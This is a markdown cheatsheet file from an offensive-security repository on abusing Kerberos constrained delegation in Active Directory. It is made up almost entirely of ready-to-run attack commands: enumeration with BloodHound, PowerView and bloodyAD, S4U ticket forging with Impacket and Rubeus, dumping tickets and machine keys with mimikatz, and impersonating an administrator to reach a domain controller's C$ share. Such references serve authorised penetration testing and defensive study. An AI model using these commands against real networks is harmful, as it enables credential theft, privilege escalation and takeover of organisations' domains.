daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

kerberos-delegation-constrained.md (3184B)


      1 ---
      2 title: "Kerberos Delegation - Constrained Delegation"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/kerberos-delegation-constrained.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-delegation-constrained.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Kerberos Delegation - Constrained Delegation
     12 
     13 > Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service.
     14 
     15 ## Identify a Constrained Delegation
     16 
     17 * BloodHound: `MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p`
     18 * PowerView: `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft`
     19 * Native
     20 
     21   ```powershell
     22   Get-DomainComputer -TrustedToAuth | select -exp dnshostname
     23   Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
     24   ```
     25 
     26 * bloodyAD:
     27 
     28   ```ps1
     29   bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=16777216))' --attr sAMAccountName,msds-allowedtodelegateto
     30   ```
     31 
     32 ## Exploit the Constrained Delegation
     33 
     34 * Impacket
     35 
     36   ```ps1
     37   getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
     38   ```
     39 
     40 * Rubeus: S4U2 attack (S4U2self + S4U2proxy)
     41 
     42   ```ps1
     43   # with a password
     44   Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password"
     45 
     46   # with a NT hash
     47   Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt
     48   Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
     49   dir \\dc.domain.com\c$
     50   ```
     51 
     52 * Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator"
     53 
     54   ```ps1
     55   # Dump ticket
     56   Rubeus.exe tgtdeleg /nowrap
     57   Rubeus.exe triage
     58   Rubeus.exe dump /luid:0x12d1f7
     59 
     60   # Create a ticket
     61   Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt
     62   ```
     63 
     64 * Rubeus : using aes256 keys
     65 
     66   ```ps1
     67   # Get aes256 keys of the machine account
     68   privilege::debug
     69   token::elevate
     70   sekurlsa::ekeys
     71 
     72   # Create a ticket
     73   Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt
     74   ```
     75 
     76 ## Impersonate a domain user on a resource
     77 
     78 Require:
     79 
     80 * SYSTEM level privileges on a machine configured with constrained delegation
     81 
     82 ```ps1
     83 PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
     84 PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
     85 PS> $idToImpersonate.Impersonate()
     86 PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
     87 PS> ls \\dc01.offense.local\c$
     88 ```